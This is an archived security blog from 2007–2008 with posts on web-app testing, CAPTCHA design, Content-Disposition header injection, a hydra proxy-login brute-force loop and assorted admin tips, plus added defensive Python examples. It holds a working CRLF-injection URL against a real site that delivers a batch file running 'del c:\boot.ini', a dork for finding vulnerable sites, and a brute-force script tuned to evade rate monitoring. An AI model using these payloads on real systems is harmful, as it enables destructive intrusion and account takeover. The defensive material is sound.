gpaharenko

Recent entries

October 29, 2008

08:32 pm: I'm looking for a job
I work as a security administrator in the "Information systems security group" of MTS-Ukraine.
I'm looking for a CISO position. I have wide skills in IT security, system administration, programming, audit and incident response.

The complete CV is available here:
  http://docs.google.com/Doc?id=dhdxn2g6_3g5bxk5

April 18, 2008

11:37 am: Quick and dirty test of Web-interface
For most web applications it is easy and reliable to perform basic security checks:

- if the web server itself has vulnerabilities: the quickest way is
to scan it with nikto and nessus
- check whether it is possible to perform actions without authorization: the
quickest way is to record admin actions with Paros and replay them with
the session id of an ordinary user, or with no session id at all
- check CSRF in a similar way
- check the inputs for SQL injection (" and ') and XSS (", ', <, >)
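The second check above (replaying a recorded admin request with an ordinary user's session id, and with no session id) can be kept as a regression test against your own application. The example below is added here and is not code from the original post; the request dataclass, the in-memory session table and the `handle` stand-in for the application are all constructed for illustration.

```python
from dataclasses import dataclass
from typing import Callable, Dict, Optional

@dataclass
class Request:
    method: str
    path: str
    session: Optional[str] = None   # value of the session cookie, as captured by the proxy

# Constructed session table standing in for the application's real session store.
SESSIONS: Dict[str, str] = {"sess-admin-1": "admin", "sess-user-7": "user"}

def handle(req: Request, check_role: bool = True) -> int:
    """Toy stand-in for the application under test; returns an HTTP status code.

    check_role=False reproduces the bug the check is meant to catch: the admin
    action is served to any session, and even to a request with no session."""
    if req.path != "/admin/delete_user":
        return 404
    if req.session not in SESSIONS:
        return 200 if not check_role else 401
    if check_role and SESSIONS[req.session] != "admin":
        return 403
    return 200

def replay_as_unprivileged(recorded: Request, handler: Callable[[Request], int],
                           low_priv_session: str) -> Dict[str, int]:
    """Replay a request recorded from an admin session (a) with an ordinary
    user's session id and (b) with no session id at all."""
    return {
        "ordinary_user": handler(Request(recorded.method, recorded.path, low_priv_session)),
        "no_session": handler(Request(recorded.method, recorded.path, None)),
    }

def authorization_enforced(results: Dict[str, int]) -> bool:
    """The action is protected only if every unprivileged replay was refused."""
    return all(status in (401, 403) for status in results.values())
```

With a real application, `handler` would send the request over HTTP and return the response status; the two replays and the pass criterion stay the same.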

April 15, 2008

05:29 pm: CAPTCHA
These are my requirements for a strong CAPTCHA:

1. The captcha should be black and white, with gradations of the colour.
2. After each login attempt, the session ID should be regenerated together with a corresponding captcha, thus preventing the same captcha from being used with different logins and the same session ID.
3. No information about the captcha should be provided to the user except the captcha itself.
4. The program should use a different font for each captcha (more than a hundred fonts).
5. There should be no empty space between characters, i.e. each character should be connected to its neighbours in at least two points; the thickness of the connections should
be similar to the thickness of the lines at the connection points.
6. There should be a line which connects all characters. The trajectory of the line changes randomly, and there should be no angles in the line (it should be smooth).
7. The stroke width of a character should change randomly within the same character.
8. The character set should include a-z0-9; similar-looking characters should be handled sensibly (o and 0, for example, should be treated as the same character).
9. The phrase should consist of 8 random characters.
10. The trajectory of the phrase should change smoothly and randomly.
12. The location of the phrase should be selected randomly on the background.
13. A random non-affine transformation should be applied to each character.
14. There should be noise over the background, with varying density across the layer.
15. There should be an increasing interval after unsuccessful logins.
16. The captcha should be recognizable by a human.
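Requirements 2, 8, 9 and 15 are server-side bookkeeping rather than image rendering, and they are where most captcha deployments go wrong. The class below is an added example, not code from the original post: it binds each captcha to a session id, consumes the id on first use whatever the outcome, folds similar-looking characters before comparing, and applies a growing per-client delay after failures. The client key, the delay curve and the 1/l folding are my assumptions.

```python
import hmac
import secrets
import string
import time

ALPHABET = string.ascii_lowercase + string.digits          # a-z0-9 (requirement 8)
# Glyphs a human cannot reliably tell apart are folded together before comparing.
# The post names o/0; the 1/l pair is my addition, on the same reasoning.
SIMILAR = str.maketrans({"0": "o", "1": "l"})

def normalize(text: str) -> str:
    return text.strip().lower().translate(SIMILAR)

class CaptchaGuard:
    """Server-side bookkeeping for requirements 2, 8, 9 and 15: a captcha is bound to
    one session id, consumed on first use, and followed by a growing delay per client
    after failures. Rendering the image (requirements 1, 4-7, 10-14) is out of scope."""

    def __init__(self, rng=secrets, clock=time.monotonic, max_delay=300):
        self._rng, self._clock, self._max_delay = rng, clock, max_delay
        self._challenges = {}   # session id -> normalized expected answer
        self._failures = {}     # client (e.g. source address) -> (count, not-before time)

    def new_challenge(self):
        """Issue a fresh session id together with its 8-character captcha text."""
        text = "".join(self._rng.choice(ALPHABET) for _ in range(8))
        sid = secrets.token_urlsafe(32)
        self._challenges[sid] = normalize(text)
        return sid, text

    def verify(self, client, sid, answer):
        """Check one login attempt. Returns (ok, new_sid, new_text): the old session id
        is invalidated whatever the outcome, so a captcha can never be replayed."""
        expected = self._challenges.pop(sid, None)
        count, not_before = self._failures.get(client, (0, 0.0))
        now = self._clock()
        ok = (expected is not None and now >= not_before and
              hmac.compare_digest(expected.encode(), normalize(answer).encode()))
        if ok:
            self._failures.pop(client, None)
        else:
            count += 1   # exponential backoff, capped (requirement 15)
            self._failures[client] = (count, now + min(2 ** count, self._max_delay))
        new_sid, new_text = self.new_challenge()
        return ok, new_sid, new_text
```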

April 12, 2008

05:29 pm: New old header injection
Recently I read a fresh post on a web security mailing list about header injection in Content-Disposition. Really a nice feature, and some sites really seem to be vulnerable. After a bit of googling with the keywords:

скачать inurl:.pdf inurl:name

on the third page I found an affected site. The following request:

http://www.XXXX.ru/file_save.html?&name=/binary/magazine_11.pdf&file=1.bat"%0d%0aContent-Type:%20application/octet-stream%0d%0aContent-Length:%2030%0d%0a%0d%0adel%20c:\boot.ini%0d%0a%0d%0a

returns a nice batch file instead of the expected pdf. Several sites on the first two pages had a newer PHP with header protection and were not affected. So keep your software up to date and validate user input.
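The defect is that a percent-decoded query value containing CR LF is pasted straight into the Content-Disposition header, so the rest of the value becomes new headers and a body. The following is an added example (not the affected site's code, nor PHP's own protection): the vulnerable construction beside a hardened one that refuses control characters and emits an RFC 6266 `filename*` parameter, plus a small splitter that shows how an HTTP parser would read the result. The sample values are constructed.

```python
import re
from urllib.parse import quote, unquote

_CONTROL = re.compile(r"[\x00-\x1f\x7f]")

def decode_query_value(raw: str) -> str:
    """Percent-decode a query parameter the way the server does before using it."""
    return unquote(raw)

def unsafe_disposition(filename: str) -> str:
    """Vulnerable: the decoded parameter is pasted straight into the header, so a
    CR LF inside it ends the header and whatever follows becomes new headers/body."""
    return 'Content-Disposition: attachment; filename="%s"' % filename

def safe_disposition(filename: str) -> str:
    """Hardened: refuse control characters outright (an injection attempt is worth
    logging, not silently repairing), send a quoted ASCII-only fallback name, and
    carry the real name percent-encoded in an RFC 6266 filename* parameter."""
    if _CONTROL.search(filename):
        raise ValueError("control character in filename")
    fallback = re.sub(r"[^A-Za-z0-9._-]", "_", filename) or "download"
    return 'Content-Disposition: attachment; filename="%s"; filename*=UTF-8\'\'%s' % (
        fallback, quote(filename, safe=""))

def header_lines(header_block: str) -> list:
    """Split a header block as an HTTP parser would: CRLF-separated lines up to the
    first empty line; anything after that is body."""
    lines = []
    for line in header_block.split("\r\n"):
        if line == "":
            break
        lines.append(line)
    return lines
```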

March 13, 2008

05:01 pm: MMS for hackers quick start
The IP stack and web standards are integrating more and more with mobile devices. Using IP instead of SS7 gives a lot of benefits, but brings much more risk as well.
Here we describe the basic tools and technologies you need to check the strength of your cell operator's MMS infrastructure. This is not a complete, and perhaps not an entirely correct, explanation, but it will give you a quick start. The Google Docs version can be found here:
  http://docs.google.com/Doc?id=dhdxn2g6_47fntwbdgf


February 3, 2008

10:02 pm: Generate anonymous ssh-key
The default ssh-keygen behaviour leaves a user@host comment in the generated keys.
Sometimes this is not desired, so you can use:
ssh-keygen -t rsa -C anonymous


December 13, 2007

05:07 pm: Using Google Hacking Database with Google AJAX Search API and custom search engines
This article is intended for security specialists, system administrators and all those who want to check web sites for obvious security flaws. It is difficult to automatically check all 1500 entries in the GHDB using the standard Google web interface. This article shows how to utilize the new AJAX Search API for this task.
Link to Google Docs: http://docs.google.com/Doc?docid=dhdxn2g6_5dw4qtwhr

December 8, 2007

05:39 pm: urlencode in command line
There are millions of ways to do this, but mine is:

root@love:~# cat /usr/local/bin/urlencode
#!/usr/bin/perl
# Percent-encode the first command-line argument with CGI.pm's escape()
use strict;
use warnings;
use CGI;

print CGI->escape($ARGV[0]);

November 30, 2007

11:15 pm: Questions on interview
At interviews people often ask interesting questions.

There were two main ones:
1) what are the first steps after incident detection (on a remote network server)
2) a secure network architecture for remote admins to reach the internal LAN
3) the latest OpenSSL vulnerability known
4) is it possible to break out of jail and chroot
5) which branch of Apache is better from a security point of view

To reduce the questions for other interviewers, here is what I've told them:

1) Take the port down. I think that is not so bad; the same is said at:
http://tldp.org/HOWTO/Security-HOWTO/after-breakin.html
(the first link when googling "what to do after incident detected")

November 27, 2007

04:00 pm: simple hydra script for testing proxy logins
# one login per hydra run, read from squid_logins.txt (one login per line)
while read -r login
do
hydra -l "${login}" -t 1 -e ns -P passwords -s 80 proxy-host http-proxy | tee -a results
sleep 1   # pause between logins to keep the connection rate low
done < squid_logins.txt

The sleep is needed because clever admins can check for a high rate of connections. Unfortunately, hydra in my opinion is not the best password brute forcer: I've been unable to limit its connection rate without ugly scripts, and for http-post it crashes on my system :-(

03:46 pm: useful command line calls for web testing
wget https://url --post-data="param=value" --no-check-certificate --no-cookies --header "Cookie: JSESSIONID=XXXXXXXXXXX"

However I'd prefer curl:

curl -b "JSESSIONID=XXXXXXXXXXXXX" "http://url?$(cat get_file)" -d "$(cat post_file)" -k

12:27 pm: webscarab & jsp
WebScarab's default pattern for excluding requests from interception contains "js", which covers jsp as well, so you should remove it or change it to something else.

November 16, 2007

12:52 pm: My article about root CA (in Russian)
There it is:
http://docs.google.com/Doc?id=dhdxn2g6_2h2xnz6

P.S. Igor Chubin (xgu.ru) kindly pointed me to "openca". Perhaps it is a good alternative as well.


12:38 pm: I've been struggling for a while with exporting the local security policy. secedit.exe /export /cfg is not working on XP! (2003 is fine). There is a known bug:
  http://support.microsoft.com/kb/889532

Unfortunately the hotfix is not publicly available.
You can order it (for free) at:
  http://support.microsoft.com/kb/897327/

Just check that you've selected the correct localization. The problem is that this method is not applicable for vendor solutions, where every Windows patch is tested :-(
